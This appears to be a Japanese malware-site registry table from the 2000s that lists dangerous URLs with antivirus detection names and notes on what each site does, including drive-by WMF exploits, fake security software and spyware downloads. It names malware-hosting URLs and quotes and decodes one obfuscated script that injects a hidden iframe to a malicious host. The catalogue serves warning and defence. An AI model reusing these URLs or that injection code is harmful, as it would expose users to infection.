| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2008/08/10] | ウィルス名:TSC_GENCLEAN+Mal_Banker |
| [2006/08/22] | ウィルス名:DIAL_DIALER.HL |
| [2007/03/18] | 海外アダルトサイトだが、ウィルス名:HTML_PSYME.AIH+EXPL_WMF.GEN を検出。 |
| [2006/05/18] | 他の方の結果では「Kaspersky 反応あり。Trojan.Win32.Diamin.ah 検出。」 |
| [2006/05/18] | 踏んでみると こんな感じ のサイトで、これ を表示する。
これ の「OK」を選ぶと再び これ を再び表示。「キャンセル」を選ぶと何も無し。 また、タスクバーにのみ存在する3つの「何か」が現れる。「何か」は不明で、閉じれば消える。 このサイトは確認した段階ではバスター無反応だった。 |
| [2008/08/10] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEALRT.BM |
| [2007/03/12] | 海外アダルトサイトだが、ウィルス名:EXPL_WMF.GEN+JS_GENERIC を検出。
ウィルス名:JS_GENERIC は検出する時と検出しない時があった。 ソースを見るとIFRAMEタグで以下のURLを呼び出している。 //search-buy.info/cyber.wmf ← ウィルス名:EXPL_WMF.GEN //2005-search.com/test/test.html ← ウィルス名:JS_GENERIC |
| [2003/11/21] | ウィルス名:JS_PETCH.A。そのウィルスが実行されるとTROJ_DELF.MというトロイをDLさせられる。
そのトロイを削除するとメディアプレイヤーを再インストしなければならない。 |
| [2004/06/06] | ウィルス名:MHTMLRedir.Exploit |
| [2008/08/10] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_DLOAD.DU |
| [2005/04/17] | ウィルス名:SPYW_NAVEXCEL.A |
| [2006/10/12] | 2006/10/08 に確認するとバスター無反応。
2006/10/08 にトレンドマイクロ社にcabファイルごと提出。 今日、その結果の連絡があり、cabファイルの中の「NHelper.dll」と「NHUpdater.exe」をウィルス名:ADW_NAVEXCEL.D として検出するよう対応、とのこと。 cabファイルの中の その他のファイルは「正常と判断したファイル」とのこと。 実際に確認すると、2006/10/08 にDLしたファイルからウィルス名:ADW_NAVEXCEL.D を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_NAVEXCEL.D を検出することを確認。 |
| [2006/02/02] | バスター無反応だが、以下のアンチウィルスソフトで反応。アドウェアである。
Dr.Web → Adware.NavHelper, DLOADER.Trojan Fortinet → NavHelper Kaspersky → not-a-virus:AdWare.Win32.NavExcel.h NOD32 → Win32/Adware.NavExcel application VBA32 → AdWare.NavExcel.h, Adware.NavExcel |
| [2006/09/02] | 2006/08/27 にトレンドマイクロ社にファイルを提出。
2006/09/01 にその結果の連絡があり、ウィルス名:ADW_NAVEXCEL.A として検出するよう対応した、とのこと。 2006/08/27 にDLしたファイルからウィルス名:ADW_NAVEXCEL.A を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:ADW_NAVEXCEL.A を検出することを確認。 |
| [2008/06/29] | ウィルス名:TSC_GENCLEAN+TROJ_ISTBAR.EB |
| [2005/08/15] | ウィルス名:TROJ_DLDR.A |
| [2006/09/27] | 再確認。ウィルス名:TROJ_Generic |
| [2004/02/22] | mailtoストーム。 |
| [2006/08/22] | ウィルス名:DIAL_INSTACCES.A |
| [2008/09/21] | こんな感じ のページだが、ウィルス名:JS_REDIRECTOR.M を検出。 |
| [2005/11/22] | ウィルス名:SPYW_PROBOT.A |
| [2005/11/22] | ウィルス名:SPYW_PROBOT.C |
| [2008/08/10] | ウィルス名:TSC_GENCLEAN+TROJ_ZLOB.FZI |
| [2005/01/10] | //bbs.fozya.com/guestbook/guestbook.shtmlに飛ぶ。 |
| [2008/09/21] | ウィルス名:TROJ_AGENT.AWRZ |
| [2008/08/27] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEAV.FP |
| [2005/12/22] | スパイウェア配布サイト。踏むと こんな感じ のサイトで、このページ表示まで無害で、普通に閉じれる。
画面中央の「Download QuickSearch Toolbar」をクリックすると、これ を新窓表示。表示して3秒後に「QVGqtb_Setup.exe」なるものをDLしろ、と催促される。 exeをDLした途端にウィルス名:ADW_NEWNET.Bを検出。 |
| [2004/08/05] | スパイウェアをDLしようとしてくる。「いいえ」を押していれば問題無し。 「はい」を押してしまった場合はアダルトサイト被害対策の部屋サイトの 対策ページ を参照。 |
| [2004/10/04] | ウィルス名:HTML_REDIR.A |
| [2008/11/09] | こんな感じ のサイト。バスター無反応だが、怪しいところがある。
直後に以下の @ のURLに飛び、こんな感じ のサイトを表示するが、少しPCが固まる。 その後、Adobe Reader 8 が落ちるが、恐らく、pdfファイルの脆弱性を狙ったものと思われる。 @、//butcoza.net/service/getfile.php?f=vispdf |
| [2007/03/18] | 海外アダルトサイト。バスター2007ではウィルス未検出だが、危険サイトとして警告を出す。 |
| [2007/03/20] | 海外アダルトサイトだが、ウィルス名:HTML_PSYME.AIH+EXPL_WMF.GEN を検出。 |
| [2009/05/09] | DL+解凍すると「3522938.exe」ファイルが現れるが、ウィルス名:TSPY_MAGANIA.HZ を検出。
ファイルサイズ:42.1 KB |
| [2006/10/18] | 海外サイトだが、ウィルス名:JS_EXCEPTION.GEN を検出。
ソースを見ると、IFRAMEタグで複数のURLを呼び出しているが、その中の以下のURLがウィルスの発動元である。 //67.15.114.122/my_stat.php |
| [2006/06/24] | ウィルス名:JAVA_BYTEVER.BD |
| [2006/06/24] | ウィルス名:JS_FLUMITA.A |
| [2006/02/10] | こんな感じ のサイトに飛ぶ。「FRAA SCAN」をクリックすると以下のexeファイルをDL出来る。バスター無反応。
//www.pcsafe.com/(synlag45ga01jc55m3g3bpub)/dl/pcsafe_dflt_preauth106.exe 以下の他の方の結果を参照。 「URLではいかにも日刊スポーツ内のページに行きそうですが、実際はPC SAFEというソフトとダウンロードページが開きます。おそらくspyaxeやwinfixer2005と同等の偽スパイウエアスキャンソフトではないかと思われます。」 「そのURLを踏んだ時点ではpcは無害です。exe実行でこのソフトは反応します。先程、PC SAFEをインストール実行してみましたが、やはりspyaxeやwinfixerと同様、「スキャン後マルウェアが貴方のpcから発見されました」(これは予めプログラムされている偽の結果です)→「除去するには製品版を購入して下さい」、というpcユーザの不安心理を煽って偽ソフトを購入させようとします。この様な部類のソフトはフォイストウエアと呼ばれているようです。悪質なプログラム故、アンチウイルスベンダーではこの手のプログラムをスパイウェア、アドウェアと同様の扱いとして、検出する傾向が強いです。」 |
| [2005/08/15] | 「BB.com」という名でブログを偽装した日本語アダルトサイト。アクセス解析も行なっている。
このような小窓 も表示するので、ワンクリック詐欺サイトとも言える。 しかし、「利用規約」という名のリンク以外は全て下のexeにリンクしている。 //www.nip-les.com/exe/update.exe ↑ このexeからトロイの木馬を検出。 |
| [2005/08/15] | メディアプレーヤーのアイコンをしたexeアプリケーション。
バスター無反応だが、以下のアンチウィルスソフトで反応。 Fortinet → W32/Kapod.C-tr Kaspersky Anti-Virus → Trojan-PSW.Win32.Kapod.c |
| [2005/05/04] | 無限ループ。mailtoストーム。 |
| [2008/08/10] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_FAKEALRT.BM |
| [2008/08/10] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEALRT.BM |
| [2007/05/19] | 2007/01/03 にトレンドマイクロ社にファイルを提出。
2007/01/11 にその結果の連絡があり、ウィルス名:TSPY_BANKER.BOJ として検出するよう対応、とのこと。 実際に 2007/01/03 にDLしたファイルからウィルス名:TSPY_BANKER.BOJ を検出することを確認。 しかし、今日改めて当該URLを確認してみると404であった。 |
| [2008/08/10] | ウィルス名:TSC_GENCLEAN+TROJ_FAKEALRT.BM |
| [2007/01/02] | ウィルス名:JS_HAXDOOR.LB 。ソースのほとんどがコード変換されている。
その中に下のURLが隠れているが、詳細は不明。 //www.xuiputalo.com/new/shenloader.exe |
| [2007/01/28] | 以下の他の方の結果を参照。
「PC有害ではないですが実際、マカフィ+IE7でアドレスを踏んでみたところ、以下のような症状になりました。 ↓ このzonahot.netは、ブラウザのセキュリティを侵害する可能性があります。 このサイトはブロックされました。 マカフィーの検査では、zonahot.netはブラウザに存在する脆弱性を攻撃し、検査用コンピュータに対して不正な変更を実行しようとしました。 これは重大なセキュリティの脅威です。パソコンがウイルスに感染する可能性があります。 サイトのリンク先には今のところPC有害なリンクなどは貼られていませんが、念のためにウィルスススキャンを行って下さい。 ウィルススキャンだけじゃ心細い場合はあなたが利用しているセキュリティソフトのサポート係までご相談を。」 |
| [2008/08/10] | ウィルス名:TSC_GENCLEAN+Mal_Banker |
| [2007/02/01] | 2007/01/21 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.PF として検出するよう対応、とのこと。 実際に 2007/01/21 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_DIALER.PF を検出することを確認。 2007/01/21 から今日まではファイルは置き換えられていないと推測される。 |
| [2006/08/07] | 軽いブラクラと思われる。これ がディスクトップ画面内を動き回る。タスクバーより閉じればそれで終わり。 |
| [2009/05/16] | ファイルサイズ:32.0 KB 。バスター無反応だが、他社製ウィルス駆除ソフトによっては反応がある。
スパイウェア関連のツール、または、ハッキング関連ツールらしい。 |
| [2009/05/15] | ファイルサイズ:24.0 KB 。ウィルス名:PE_GENERIC |
| [2005/11/22] | 「remtoolv01.zip」というファイルが落ちてくるが、ウィルス名:HKTL_REMOTEREM.A を検出。 |
| [2005/11/22] | 「MAYA PWS v1[1].0.zip」というファイルが落ちてくるが、ウィルス名:TROJ_MAYA.A+TROJ_MAYA.B+HKTL_MYEDITOR.A を検出。 |
| [2005/11/22] | 「NuclearUploader1[1].2.zip」というファイルが落ちてくるが、ウィルス名:BKDR_NUCLEDOR.A+BKDR_NUCLEDOR.C+BKDR_NUCLEDR.10A+BKDR_NUCLEDR.11A を検出。 |
| [2005/11/22] | 「GhostVoice.zip」というファイルが落ちてくるが、ウィルス名:BKDR_GHOSTVC.A+BKDR_GHSTVOICE.C+BKDR_GHOICE.12 を検出。 |
| [2005/11/22] | 「nuclearbot10beta1.rar」というファイルが落ちてくるが、ウィルス名:BKDR_DELF.LI+BKDR_DELF.H を検出。 |
| [2005/11/22] | 「Seed1[1].1.zip」というファイルが落ちてくるが、ウィルス名:BKDR_WINTRSEED.A を検出。 |
| [2005/11/22] | 「bndkv12.zip」というファイルが落ちてくるが、ウィルス名:HKTL_BANDOK.A を検出。 |
| [2005/11/22] | 「bndk13.zip」というファイルが落ちてくるが、ウィルス名:BKDR_BANDOK.J+BKDR_BANDOK.F を検出。 |
| [2005/06/19] | 海外アダルトサイト。別窓は他海外アダルトサイトをランダムに表示。
ウィルス名:JAVA_BYTEVER.A。少ししてJAVA_BYTEVER.A-1を検出。 これはURLにウィルス憑きURLを呼ぶ仕掛けが施されていて、別窓にもウィルス憑きURLを呼ぶ仕掛けが施されている場合があるため。 ウィルス憑きURLを読み込む時間差によって、ウィルスを検出する時間に差がある。 ウィルス憑きURLを呼ぶ仕掛け部分は暗号化されていて、以下のように読めないように工夫されている。 <script language=javascript>eval(String.fromCharCode( 100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102, 114,97,109,101,32,98,111,114,100,101,114,61,48,32,119,105,100,116,104, 61,48,32,104,101,105,103,104,116,61,48,32,115,116,121,108,101,61,39,100, 105,115,112,108,97,121,58,110,111,110,101,39,32,115,114,99,61,39,104,116, 116,112,58,47,47,99,111,111,108,119,101,98,115,101,97,114,99,104,120,46, 98,105,122,47,107,111,114,110,47,39,62,60,47,105,102,114,97,109,101,62,34,41))</script> ↑ 上を読めるようにすると下のようになる。 ↓ document.write("<iframe border=0 width=0 height=0 style='display:none' src='http://coolwebsearchx.biz/korn/'></iframe>") |
| [2005/06/29] | 他の方の鑑定結果では、ウィルス名:HTML_REDIR.ABを検出するらしい。
そのサイトの「WATCH…」を踏むとウィルス付きサイトに飛ばされる。バスターで3種検出。 |
| [2006/01/07] | 他の方の結果では、「Trojan-Downloader.JS.Agent.i など検出。」 |
| [2006/09/09] | 海外アダルトサイト。別のアダルトサイト1枚付き。閉じると別のアダルトサイトが何枚か開く。
「cyber.wmf」なるファイルをDLしろ、と言ってきてウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN を検出。 ソースを見るとIFRAMEタグで以下のURLを呼び出している。 //cyber-search.biz/cyber.wmf |
| [2006/10/19] | ウィルス名:TROJ_DLOADER.BSK |
| [2006/02/03] | バスター無反応。スパイウェアも無し。いわゆる「驚かす目的」のサイトと思われる。
踏むと こんな画面 を声付きで表示。その声は「あなたは赤い部屋が好きですか?」と聞こえる。 閉じると この小窓 が「あなたは赤い部屋が好きですか?」という声付きで、表示しては消え、再び表示しては消える。 突如、全画面で こんな感じ になり、その後、こんな画面 を金切声付きの全画面で表示する。閉じれば終わる。 |
| [2002/11/16] | IPを抜かれる。 |
| [2005/12/04] | メディアプレーヤーのアイコンをしたアプリケーションが落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 AntiVir → Trojan/PSW.Kapod.K Fortinet → W32/Kapod.K!pws Kaspersky Anti-Virus → Trojan-PSW.Win32.Kapod.k NOD32 → a variant of Win32/Tsipe |
| [2005/08/22] | 踏むとブラクラ並に色々なアダルトサイトが開いていく。その過程でウィルス名:HTML_REDIR.AIを検出。 |